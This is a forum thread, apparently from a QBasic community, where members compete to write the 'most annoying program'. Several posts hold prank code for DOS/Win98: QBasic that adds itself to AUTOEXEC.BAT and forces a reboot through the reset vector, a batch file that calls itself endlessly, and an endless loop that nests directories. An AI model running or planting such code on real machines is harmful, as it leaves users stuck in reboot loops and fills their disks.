Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
New challenge - most annoying program
#11
How about a different approach:

Code:
x

Thats annoying because it wont compile and cannot be run in the interpretter without error. Its even more annoying, because you cant debug or fix it, because you dont know what I had in mind, it could have been a really great game or awesome screensaver but now you will never know. ;-)

BTW, Rel that /is/ annoying, I dont even want to run it, but its annoying to know that you think like that. j/k ;-)

If I could be bother digging out the info on that Intel video card that had a hardware bug that allowed programmers to feed instructions to the card that would cause its cpu to overheat and blowup, that would certainly be annoying, then again I doubt anyone has one of those cards any more.
esus saves.... Passes to Moses, shoots, he scores!
Reply
#12
How about this one:

Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
   PRINT #1, "THISPROGRAM.EXE"
CLOSE #1

DEF SEG = &HFFFF
CALL Absolute(0)

Do not use F8 or advanced starting up options. Works under Win98. (not under later).
Reply
#13
I suppose you could always add this to your autoexec.bat file
Code:
:loop
autoexec.bat
goto loop
url=http://www.spreadfirefox.com/?q=affiliates&id=60131&t=79][Image: safer.gif][/url]
END OF LINE.
Reply
#14
Does that just keep opening up the autoexec.bat file until all your memory runs out, and your sys crashes?
earn.
Reply
#15
Not just that, each file you open continues to open more files, kinda like bacteria multiplying. Smile I'm sure Windows Safe Mode would stop it tho.
url=http://www.spreadfirefox.com/?q=affiliates&id=60131&t=79][Image: safer.gif][/url]
END OF LINE.
Reply
#16
Try to put this in autoexec.bat:

Code:
:loop
md a
cd a
goto loop
Reply
#17
Code:
OPEN "C:\AUTOEXEC.BAT" FOR APPEND AS #1
PRINT #1, "THISPROG.EXE"
CLOSE

DEF SEG = 0
POKE &H473, &H12
POKE &H472, &H34
DEF SEG = &HFFFF
CALL Absolute(0)
Reply
#18
Oh oh oHHHHH!! I got one, I have an idea for an annoying program!!!!

Code:
DO
PRINT "*annoying mocking voice* Hi I'm wildcard. You can't do this and that. I'm a big jerk face. Waaaaa, I'm complaining about lots of stupid stuff."
LOOP
earn.
Reply
#19
CLS
DO
I$ = INKEY$
IF I$ <> "" then EXIT DO: PRINT "You pressed <any key>."
LOOP

'Rel, that's dangerous!
Peace cannot be obtained without war. Why? If there is already peace, it is unnecessary for war. If there is no peace, there is already war."

Visit www.neobasic.net to see rubbish in all its finest.
Reply
#20
ouf , and what may that be?
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)